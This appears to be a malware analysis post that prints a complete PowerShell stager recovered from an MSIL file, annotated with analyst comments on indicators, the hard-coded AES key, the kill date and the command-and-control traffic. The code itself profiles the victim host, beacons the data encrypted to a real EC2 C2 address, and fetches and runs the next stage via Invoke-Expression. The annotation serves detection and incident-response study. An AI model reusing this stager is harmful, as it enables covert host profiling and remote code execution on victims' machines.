dissectmalware

Malicious Powershell Embedded in MSIL file

Jul 27th, 2018
# malicious powershell embedded in https://www.virustotal.com/#/file/c559fb75ccbe922c2b3f28c40f6525d575406d64febd87b68d0c4c0141d4aaa6/detection
 
# Analyst notes on the top-level setup of this stager:
# Disabling ServerCertificateValidationCallback makes every HTTPS request made
# below accept any server certificate (self-signed C2 certs work). An assignment
# of {$true} to this callback is a useful script-block-logging indicator.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
# C2 base URL (network IoC: the EC2 hostname and port below). $sc is not
# referenced in the visible code; presumably used by the downloaded stage.
$sc="https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443"
# $s is the URL primer polls for the next stage. Both are script-scope and
# only rewritten in Get-Webclient when $h is non-empty (it is empty here).
$s="https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443/images/static/content/"
# Builds the AES (RijndaelManaged) cipher object shared by ENC and DEC:
# CBC mode, zero padding, 128-bit block, 256-bit key. Key and IV may each be
# passed as a base64 string or as a byte array, and either may be omitted.
# Returns the configured RijndaelManaged instance.
function CAM ($key,$IV){
$a = New-Object -TypeName "System.Security.Cryptography.RijndaelManaged"
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
# PaddingMode.Zeros pads the plaintext with NUL bytes that are not stripped on
# decrypt, so DEC output may carry trailing NULs.
$a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$a.BlockSize = 128
$a.KeySize = 256
# IV is only set when supplied: DEC passes the 16 bytes it split off the
# message; ENC passes nothing and appears to rely on the cipher object
# providing its own IV (NOTE(review): confirm against .NET behaviour).
if ($IV)
{
if ($IV.getType().Name -eq "String")
{$a.IV = [System.Convert]::FromBase64String($IV)}
else
{$a.IV = $IV}
}
# Same handling for the key; the callers in this sample pass a base64 string.
if ($key)
{
if ($key.getType().Name -eq "String")
{$a.Key = [System.Convert]::FromBase64String($key)}
else
{$a.Key = $key}
}
$a}
# Encrypts the string $un with the base64 key $key and returns
# base64( IV || ciphertext ), the layout DEC expects. No IV is passed to CAM,
# so the IV used is whatever the freshly built cipher object holds.
function ENC ($key,$un){
$b = [System.Text.Encoding]::UTF8.GetBytes($un)
$a = CAM $key
$e = $a.CreateEncryptor()
$f = $e.TransformFinalBlock($b, 0, $b.Length)
# Prepend the 16-byte IV so the receiver can recover it (DEC reads $b[0..15]).
[byte[]] $p = $a.IV + $f
[System.Convert]::ToBase64String($p)
}
# Inverse of ENC: base64-decodes $enc, takes its first 16 bytes as the IV and
# AES-CBC-decrypts the remainder with $key, returning the UTF-8 plaintext.
# With the zero padding configured in CAM the result may end in trailing NULs.
# Because primer hard-codes the key, captured C2 responses can be decrypted
# offline with this same routine during incident analysis.
function DEC ($key,$enc){
$b = [System.Convert]::FromBase64String($enc)
$IV = $b[0..15]
$a = CAM $key $IV
$d = $a.CreateDecryptor()
$u = $d.TransformFinalBlock($b, 16, $b.Length - 16)
[System.Text.Encoding]::UTF8.GetString($u)}
# Returns a System.Net.WebClient configured for the C2 check-in.
# $Cookie: the encrypted beacon produced by primer, sent as "SessionID=<base64>".
# Kill date: the function calls exit (terminating the whole script) once the
# current date is past 09/08/2018 (dd/MM/yyyy, i.e. 9 August 2018).
function Get-Webclient ($Cookie) {
$d = (Get-Date -Format "dd/MM/yyyy");
$d = [datetime]::ParseExact($d,"dd/MM/yyyy",$null);
$k = [datetime]::ParseExact("09/08/2018","dd/MM/yyyy",$null);
if ($k -lt $d) {exit}
# Proxy settings are left empty in this sample, so the $proxyurl branch below
# is never taken.
$username = ""
$password = ""
$proxyurl = ""
$wc = New-Object System.Net.WebClient;
 
# $h is an optional Host-header override; it is empty here, so neither branch
# runs. The elseif would repoint the script-scope $s/$sc at $h.
$h=""
if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)}
elseif($h){$script:s="https://$($h)images/static/content/";$script:sc="https://$($h)"}
# Fixed Internet Explorer 11 User-Agent and an empty Referer: both usable as
# network indicators together with the /images/static/content/ path.
$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko")
$wc.Headers.Add("Referer","")
if ($proxyurl) {
$wp = New-Object System.Net.WebProxy($proxyurl,$true);
if ($username -and $password) {
$PSS = ConvertTo-SecureString $password -AsPlainText -Force;
$getcreds = new-object system.management.automation.PSCredential $username,$PSS;
$wp.Credentials = $getcreds;
} else { $wc.UseDefaultCredentials = $true; }
$wc.Proxy = $wp; } else {
# No explicit proxy: use the system proxy with the current user's credentials.
$wc.UseDefaultCredentials = $true;
$wc.Proxy.Credentials = $wc.Credentials;
} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") }
$wc }
# First check-in. Builds the host profile
#   "<domain>\<user>;<user>;<computername>;<arch>;<pid>;<C2 url>"
# encrypts it with the hard-coded base64 key, sends it as the SessionID cookie
# in a GET to $s, and returns the decrypted response (the next stage, which the
# caller runs through iex). Get-Webclient may exit the script on the kill date.
function primer {
# As SYSTEM, $env:username is "<COMPUTERNAME>$"; map it to a readable label.
if ($env:username -eq "$($env:computername)$"){$u="NT AUTHORITY\SYSTEM"}else{$u=$env:username}
$o="$env:userdomain\$u;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com"
# The bare token after -key is taken as a string and base64-decoded by CAM.
# The same static key is used in both directions, so recorded traffic is
# decryptable once the key is recovered from the sample.
$pp=enc -key 0Kdjin+hG/Ym53Fa2i4C8y8PSh8ckR1zIl5CkHrPV00= -un $o
$primer = (Get-Webclient -Cookie $pp).downloadstring($s)
dec -key 0Kdjin+hG/Ym53Fa2i4C8y8PSh8ckR1zIl5CkHrPV00= -enc $primer}
# Entry point: fetch the stage and execute it in-process with Invoke-Expression.
# If the first check-in returns nothing, wait 1800 s (30 min) and try exactly
# once more; this is a single retry, not a loop. Network-fetched content piped
# straight into iex is the behaviour to alert on here.
$primer = primer
if ($primer) {$primer| iex} else {
start-sleep 1800
primer | iex }